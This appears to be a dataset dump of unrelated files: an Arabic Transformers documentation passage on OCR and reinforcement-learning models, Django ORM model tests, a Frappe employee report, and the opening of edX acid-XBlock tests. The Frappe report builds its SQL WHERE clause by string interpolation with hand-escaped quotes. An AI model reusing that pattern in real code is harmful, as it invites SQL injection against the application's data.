التعرّف البصري على الحروف (OCR) مهمة قديمة لتعرّف النصوص، التي تنطوي عادةً على عدة مكونات لفهم الصورة وتوليد النص. [TrOCR](model_doc/trocr) بتبسيط العملية باستخدام محول متكامل من النهاية إلى النهاية. المشفر هو نموذج على غرار ViT لفهم الصورة ويعالج الصورة كقطع ثابتة الحجم. يقبل فك التشفير حالات الإخفاء للمشفر وينشئ النص بشكل تلقائي. [Donut](model_doc/donut) هو نموذج أكثر عمومية لفهم المستندات المرئية لا يعتمد على نهج OCR. يستخدم محول Swin كمشفر وBART متعدد اللغات كمُفكّك تشفير. يتم تدريب Donut على قراءة النص عن طريق التنبؤ بالكلمة التالية بناءً على ملاحظات الصورة والنص. يقوم فك التشفير بتوليد تتسلسلًا رمزيًا بناءً على موجه (Prompt). يتم تمثيل الموجه بواسطة رمز خاص لكل مهمة. على سبيل المثال، يحتوي تحليل المستند على رمز خاص "parsing" يتم دمجه مع حالات الإخفاء للـمُشفّر لتحليل المستند بتنسيق إخراج منظم (JSON).
## التعلم التعزيزي (Reinforcement learning - RL)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2FiB3Y6RvWYki7ZuKO6tNgZq%2Freinforcement-learning%3Fnode-id%3D0%253A1%26t%3DhPQwdx3HFPWJWnVf-1" allowfullscreen></iframe>
### فك التشفير[[rl-decoder]]
يقوم نموذج "محوّل القرارات والمسارات" (Decision and Trajectory Transformer) بتحويل الحالة (State) والإجراء (Action) والمكافأة (Reward) كمشكلة نمذجة تسلسلية. [محوّل القرارات](model_doc/decision_transformer) يقوم بتوليد سلسلة من الإجراءات التي تؤدي إلى عائد مرغوب في المستقبل بناءً على العوائد المتوقعة، والحالات والإجراءات السابقة. في الخطوات الزمنية *K* الأخيرة، يتم تحويل كل وسائط البيانات الثلاث vإلى متجهات تضمين رمزيّة ومعالجتها بواسطة نموذج مشابه لـ GPT للتنبؤ برمز الإجراء المستقبلي.يقوم [محول المسار](model_doc/trajectory_transformer) أيضًا بتحويل الحالات والإجراءات والمكافآت إلى رموز ومعالجتها باستخدام هيكلية GPT. على عكس "محوّل القرارات"، الذي يركز على تكييف المكافأة، يقوم "محوّل المسارات" بتوليد إجراءات مستقبلية باستخدام البحث الشعاعي (Beam Search). | unknown | github | https://github.com/huggingface/transformers | docs/source/ar/model_summary.md |
from __future__ import unicode_literals
import threading
import warnings
from datetime import datetime, timedelta
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections
from django.db.models.fields import Field
from django.db.models.fields.related import ForeignObjectRel
from django.db.models.manager import BaseManager
from django.db.models.query import EmptyQuerySet, QuerySet
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.utils import six
from django.utils.translation import ugettext_lazy
from .models import Article, ArticleSelectOnSave, SelfRef
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
six.assertRaisesRegex(
self,
TypeError,
"'foo' is an invalid keyword argument for this function",
Article,
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertNotEqual(a.id, None)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date,
datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Parrot programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
six.assertRaisesRegex(
self,
AttributeError,
"Manager isn't accessible via Article instances",
getattr,
Article(),
"objects",
)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"])
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
@skipUnlessDBFeature('supports_microsecond_precision')
def test_microsecond_precision(self):
# In PostgreSQL, microsecond-level precision is available.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date,
datetime(2005, 7, 31, 12, 30, 45, 180))
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(
Article.objects.get(id__exact=a9.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45),
)
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported_edge_case(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a = Article.objects.create(
headline='Article',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertEqual(
Article.objects.get(pk=a.pk).pub_date,
datetime(2008, 12, 31, 23, 59, 59),
)
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"])
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline,
'\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_field_ordering(self):
"""
Field instances have a `__lt__` comparison function to define an
ordering based on their creation. Prior to #17851 this ordering
comparison relied on the now unsupported `__cmp__` and was assuming
compared objects were both Field instances raising `AttributeError`
when it should have returned `NotImplemented`.
"""
f1 = Field()
f2 = Field(auto_created=True)
f3 = Field()
self.assertLess(f2, f1)
self.assertGreater(f3, f1)
self.assertIsNotNone(f1)
self.assertNotIn(f2, (None, 1, ''))
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual([sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]])
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_ugettext_lazy(self):
"""
Test that ugettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = ugettext_lazy(notlazy)
# create() must resolve the lazy Promise to its string value.
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
# EmptyQuerySet is a marker class only, used via isinstance checks.
# Can't be instantiated
with self.assertRaises(TypeError):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
# values_list() on none() must stay an EmptyQuerySet and must not
# issue any SQL query at all.
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
# Forcibly retype the queryset to simulate a custom manager.
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
# Custom methods must survive the none() conversion.
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
# Chaining order_by()/filter() onto none() must not trigger queries.
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
# distinct(*fields) requires backend support (e.g. PostgreSQL),
# hence the skipUnlessDBFeature guard.
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
# get() on a reverse relation that matches nothing must raise
# ObjectDoesNotExist rather than some other error (refs #20278).
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
# Model equality is based on primary key when one is set...
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
# ...and on identity when the instance has no pk.
a = Article()
self.assertEqual(a, a)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
with self.assertRaises(TypeError):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
class ModelLookupTest(TestCase):
"""Exercise the basic ORM lookup API (get/filter/pk shortcuts) on Article."""
def setUp(self):
# Create an Article.
self.a = Article(
id=None,
headline='Swallow programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
self.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Parrot programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(),
['<Article: Parrot programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
# week_day is 1 (Sunday) to 7 (Saturday); 2005-07-28 is a Thursday (5).
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
id__exact=2000,
)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
self.assertRaises(
ObjectDoesNotExist,
Article.objects.get,
pub_date__year=2005,
pub_date__month=8,
)
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
pub_date__week_day=6,
)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]),
["<Article: Swallow programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Swallow bites Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
# NOTE(review): these regex strings contain \( \) escapes in non-raw
# string literals; consider r"..." to avoid invalid-escape warnings.
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
headline__startswith='Swallow',
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
pub_date__month=7,
)
class ConcurrentSaveTests(TransactionTestCase):
"""Verify save() behavior when another connection deletes the row."""
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
# NOTE(review): this assertion runs inside the worker thread; a
# failure here would not propagate to the main thread -- confirm
# that the exceptions-list check is the intended safety net.
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
# The row is gone, so save() must fall back to an INSERT.
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(SimpleTestCase):
"""Guard the exact set of QuerySet methods proxied onto Manager."""
# Whitelist of QuerySet methods that Manager is expected to proxy.
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'_insert',
'_update',
'raw',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet).keys()),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
"""Tests for Meta.select_on_save (SELECT-then-UPDATE/INSERT on save)."""
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
# Plain model: a single UPDATE query on save.
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
# select_on_save: SELECT first, then UPDATE -> two queries.
with self.assertNumQueries(2):
asos.save()
# force_update skips the existence SELECT.
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
# force_update on a deleted row must raise, not silently insert.
with self.assertRaises(DatabaseError):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
Test that select_on_save works correctly if the database
doesn't return correct information about matched rows from
UPDATE.
"""
# Change the manager to not return "row matched" for update().
# We are going to change the Article's _base_manager class
# dynamically. This is a bit of a hack, but it seems hard to
# test this properly otherwise. Article's manager, because
# proxy models use their parent model's _base_manager.
orig_class = Article._base_manager.__class__
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super(FakeQuerySet, self)._update(*args, **kwargs)
# Pretend the UPDATE matched zero rows.
return 0
class FakeManager(orig_class):
def get_queryset(self):
return FakeQuerySet(self.model)
try:
Article._base_manager.__class__ = FakeManager
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaises(DatabaseError):
asos.save(force_update=True)
with self.assertRaises(DatabaseError):
asos.save(update_fields=['pub_date'])
finally:
# Always restore the real manager class.
Article._base_manager.__class__ = orig_class
class ModelRefreshTests(TestCase):
"""Tests for Model.refresh_from_db()."""
def _truncate_ms(self, val):
# MySQL < 5.6.4 removes microseconds from the datetimes which can cause
# problems when comparing the original value to that loaded from DB
return val - timedelta(microseconds=val.microsecond)
def test_refresh(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.filter(pk=a.pk).update(headline='new headline')
# A full refresh is a single SELECT.
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
# fields=[...] refreshes only the named fields.
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
# Unsaved in-memory change is overwritten by the DB value.
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = self._truncate_ms(datetime.now())
a = Article.objects.create(pub_date=pub_date)
# A bare instance with only a pk can be populated via refresh.
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
# Refreshing an empty field list is a no-op: zero queries.
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
class TestRelatedObjectDeprecation(SimpleTestCase):
"""Accessing field.related must emit exactly one deprecation warning."""
def test_field_related_deprecation(self):
field = SelfRef._meta.get_field('selfref')
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
# The deprecated attribute still returns a ForeignObjectRel...
self.assertIsInstance(field.related, ForeignObjectRel)
# ...and exactly one warning with the expected message is raised.
self.assertEqual(len(warns), 1)
self.assertEqual(
str(warns.pop().message),
'Usage of field.related has been deprecated. Use field.remote_field instead.'
) | unknown | codeparrot/codeparrot-clean | |
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import flt
def execute(filters=None):
# Report entry point expected by frappe: returns (columns, data).
# `filters` may contain "month" and/or "company" (see get_conditions).
if not filters: filters = {}
columns = get_columns()
data = get_employees(filters)
return columns, data
def get_columns():
    """Return the report column definitions.

    Each entry uses frappe's "Label:Fieldtype/Options:Width" column syntax
    (an empty fieldtype, as for Gender, renders as plain data).
    """
    specs = [
        ("Employee", "Link/Employee", 120),
        ("Date of Birth", "Date", 100),
        ("Branch", "Link/Branch", 120),
        ("Department", "Link/Department", 120),
        ("Designation", "Link/Designation", 120),
        ("Gender", "", 60),
        ("Company", "Link/Company", 120),
    ]
    return ["%s:%s:%d" % spec for spec in specs]
def get_employees(filters):
# Fetch active employees matching the filters as a list of rows
# (as_list=1) in the same order as get_columns().
# NOTE(review): the WHERE fragment is interpolated directly into the
# SQL string; values are quoted in get_conditions(), but parameterized
# queries would be safer -- confirm against frappe.db.sql conventions.
conditions = get_conditions(filters)
return frappe.db.sql("""select name, date_of_birth, branch, department, designation,
gender, company from tabEmployee where status = 'Active' %s""" % conditions, as_list=1)
def get_conditions(filters):
    """Build the SQL WHERE-clause fragment for the report filters.

    Args:
        filters: dict that may contain "month" (three-letter English month
            abbreviation, e.g. "Feb") and/or "company" (company name).

    Returns:
        A string of zero or more " and <cond>" fragments, suitable for
        appending to a query that already has a WHERE clause; "" when no
        filter applies.
    """
    months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
              "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
    conditions = ""
    if filters.get("month"):
        # SQL month() is 1-based, hence index + 1.
        conditions += " and month(date_of_birth) = '%s'" % (months.index(filters["month"]) + 1)
    if filters.get("company"):
        # Escape single quotes for the SQL string literal. The original
        # used .replace("'", "\'"), which is a no-op because the source
        # sequence "\'" is identical to "'", leaving quoted company names
        # able to break (or inject into) the query.
        conditions += " and company = '%s'" % filters["company"].replace("'", "\\'")
    return conditions
"""
Acceptance tests for Studio related to the acid xblock.
"""
from bok_choy.web_app_test import WebAppTest
from ...pages.studio.auto_auth import AutoAuthPage
from ...pages.studio.overview import CourseOutlinePage
from ...pages.xblock.acid import AcidView
from ...fixtures.course import CourseFixture, XBlockFixtureDesc
class XBlockAcidBase(WebAppTest):
"""
Base class for tests that verify that XBlock integration is working correctly
"""
# Abstract base: excluded from test discovery; subclasses set True.
# Subclasses must define setup_fixtures() and assign self.user there.
__test__ = False
def setUp(self):
"""
Create a unique identifier for the course used in this test.
"""
# Ensure that the superclass sets up
super(XBlockAcidBase, self).setUp()
# Define a unique course identifier
self.course_info = {
'org': 'test_org',
'number': 'course_' + self.unique_id[:5],
'run': 'test_' + self.unique_id,
'display_name': 'Test Course ' + self.unique_id
}
self.outline = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_id = '{org}.{number}.{run}'.format(**self.course_info)
# Provided by the concrete subclass; also sets self.user.
self.setup_fixtures()
self.auth_page = AutoAuthPage(
self.browser,
staff=False,
username=self.user.get('username'),
email=self.user.get('email'),
password=self.user.get('password')
)
self.auth_page.visit()
def validate_acid_block_preview(self, acid_block):
"""
Validate the Acid Block's preview
"""
self.assertTrue(acid_block.init_fn_passed)
self.assertTrue(acid_block.resource_url_passed)
self.assertTrue(acid_block.scope_passed('user_state'))
self.assertTrue(acid_block.scope_passed('user_state_summary'))
self.assertTrue(acid_block.scope_passed('preferences'))
self.assertTrue(acid_block.scope_passed('user_info'))
def test_acid_block_preview(self):
"""
Verify that all expected acid block tests pass in studio preview
"""
self.outline.visit()
subsection = self.outline.section('Test Section').subsection('Test Subsection')
unit = subsection.expand_subsection().unit('Test Unit').go_to()
acid_block = AcidView(self.browser, unit.xblocks[0].preview_selector)
self.validate_acid_block_preview(acid_block)
def test_acid_block_editor(self):
"""
Verify that all expected acid block tests pass in studio editor
"""
self.outline.visit()
subsection = self.outline.section('Test Section').subsection('Test Subsection')
unit = subsection.expand_subsection().unit('Test Unit').go_to()
acid_block = AcidView(self.browser, unit.xblocks[0].edit().editor_selector)
# Only init/resource checks apply in the editor view (no user scopes).
self.assertTrue(acid_block.init_fn_passed)
self.assertTrue(acid_block.resource_url_passed)
class XBlockAcidNoChildTest(XBlockAcidBase):
"""
Tests of an AcidBlock with no children
"""
